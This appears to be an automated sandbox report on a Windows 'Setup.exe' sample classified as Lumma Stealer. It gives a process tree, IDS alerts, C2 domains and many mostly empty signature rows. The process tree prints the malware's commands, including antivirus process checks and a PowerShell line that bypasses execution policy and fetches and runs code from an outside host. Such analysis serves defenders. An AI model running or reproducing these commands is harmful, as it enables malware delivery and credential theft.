Windows
Analysis Report
Setup.exe
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- Setup.exe (PID: 4836 cmdline:
"C:\Users\ user\Deskt op\Setup.e xe" MD5: 380CEF4CFA43FA74716059E3296850EC) - cmd.exe (PID: 2172 cmdline:
"C:\Window s\System32 \cmd.exe" /c move Pr o Pro.cmd & Pro.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 4612 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 348 cmdline:
tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1) - findstr.exe (PID: 6520 cmdline:
findstr /I "opssvc w rsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - tasklist.exe (PID: 6420 cmdline:
tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1) - findstr.exe (PID: 5784 cmdline:
findstr "A vastUI AVG UI bdservi cehost nsW scSvc ekrn SophosHea lth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - cmd.exe (PID: 4720 cmdline:
cmd /c md 302164 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - extrac32.exe (PID: 6512 cmdline:
extrac32 / Y /E Henta i MD5: 9472AAB6390E4F1431BAA912FCFF9707) - findstr.exe (PID: 6460 cmdline:
findstr /V "ENOUGH" Golf MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - cmd.exe (PID: 5068 cmdline:
cmd /c cop y /b 30216 4\Vulnerab ility.com + Tape + N aval + Off ered + Rho de + Wirin g + Tapes + Loc + Tr easures + Determinin g + Tiny + Affects + Computing 302164\Vu lnerabilit y.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - cmd.exe (PID: 5176 cmdline:
cmd /c cop y /b ..\Ac hieved + . .\Indians + ..\Por + ..\Argent ina + ..\D ocumentati on + ..\Us da + ..\St andard + . .\Cdt v MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - Vulnerability.com (PID: 2316 cmdline:
Vulnerabil ity.com v MD5: 62D09F076E6E0240548C2F837536A46A) - powershell.exe (PID: 6008 cmdline:
powershell -exec byp ass [Net.s ervicepOIN TmANaGer]: :SEcURiTyP rOtoCOl = [Net.SecUr iTyprOtoco ltYPe]::tL s12; $gD=' https://df gh.online/ invoker.ph p?compName ='+$env:co mputername ; $pTSr = iWr -uRi $ gD -uSebAS IcpARsiNg -UsErAGent 'Mozilla/ 5.0 (Windo ws NT 10.0 ; Win64; x 64) AppleW ebKit/57.3 6 (KHTML, like Gecko ) Chrome/1 2.0.0.0 Sa fari/57.36 '; IEx $Pt sr.Content ; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 6460 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - choice.exe (PID: 3304 cmdline:
choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Lumma Stealer, LummaC2 Stealer | Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. | No Attribution |
{"C2 url": ["crowdwarek.shop", "handscreamny.shop", "soundtappysk.shop", "throwlette.cyou", "robinsharez.shop", "apporholis.shop", "versersleep.shop", "chipdonkeruz.shop", "femalsabler.shop"], "Build id": "hRjzG3--TRON"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security | ||
JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): |
Source: | Author: frack113: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-10T23:28:04.312317+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49871 | 104.102.49.254 | 443 | TCP |
2025-01-10T23:28:05.524064+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49882 | 104.21.32.1 | 443 | TCP |
2025-01-10T23:28:17.637094+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49962 | 104.21.32.1 | 443 | TCP |
2025-01-10T23:28:18.854106+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49970 | 104.21.32.1 | 443 | TCP |
2025-01-10T23:28:19.827278+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49978 | 104.21.32.1 | 443 | TCP |
2025-01-10T23:28:20.857657+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49985 | 104.21.32.1 | 443 | TCP |
2025-01-10T23:28:41.782800+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49987 | 104.21.32.1 | 443 | TCP |
2025-01-10T23:28:42.729942+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49988 | 104.21.32.1 | 443 | TCP |
2025-01-10T23:28:45.728519+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49989 | 104.21.32.1 | 443 | TCP |
2025-01-10T23:28:47.789238+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49990 | 104.21.32.1 | 443 | TCP |
2025-01-10T23:28:49.140141+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49991 | 185.161.251.21 | 443 | TCP |
2025-01-10T23:28:49.971104+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49992 | 172.67.162.153 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-10T23:28:17.133440+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49882 | 104.21.32.1 | 443 | TCP |
2025-01-10T23:28:18.111531+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49962 | 104.21.32.1 | 443 | TCP |
2025-01-10T23:28:48.270897+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49990 | 104.21.32.1 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-10T23:28:17.133440+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49882 | 104.21.32.1 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-10T23:28:18.111531+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.5 | 49962 | 104.21.32.1 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-10T23:28:03.585264+0100 | 2059035 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 63819 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-10T23:28:03.619601+0100 | 2059037 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 60134 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-10T23:28:03.597572+0100 | 2059039 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 65405 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-10T23:28:03.575154+0100 | 2059041 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 61126 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-10T23:28:03.630579+0100 | 2059043 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 53020 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-10T23:28:03.641209+0100 | 2059049 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 59614 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-10T23:28:03.558872+0100 | 2059051 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 50381 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-10T23:28:03.608592+0100 | 2059057 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 56069 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-10T23:28:19.339853+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49970 | 104.21.32.1 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-10T23:28:04.910878+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49871 | 104.102.49.254 | 443 | TCP |
Click to jump to signature section
AV Detection |
---|
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | Malware Configuration Extractor: |
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: |
Source: | Static PE information: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Directory queried: |
Source: | Code function: | 0_2_004062D5 | |
Source: | Code function: | 0_2_00402E18 | |
Source: | Code function: | 0_2_00406C9B |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: |
Source: | File created: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: |
Source: | JA3 fingerprint: |
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Code function: | 0_2_004050CD |
Source: | Code function: | 0_2_004044A5 |
Source: | Code function: | 0_2_00403883 |
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior |
Source: | Code function: | 0_2_0040497C | |
Source: | Code function: | 0_2_00406ED2 | |
Source: | Code function: | 0_2_004074BB |
Source: | Dropped File: |
Source: | Code function: |
Source: | Static PE information: |
Source: | Static PE information: |
Source: | Classification label: |
Source: | Code function: | 0_2_004044A5 |
Source: | Code function: | 0_2_004024FB |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | Static PE information: |
Source: | WMI Queries: | ||
Source: | WMI Queries: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Virustotal: | ||
Source: | ReversingLabs: |
Source: | File read: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Process created: |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Static file information: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Data Obfuscation |
---|
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Code function: | 0_2_004062FC |
Source: | Code function: | 17_2_03393EF8 | |
Source: | Code function: | 17_2_033936DA |
Persistence and Installation Behavior |
---|
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
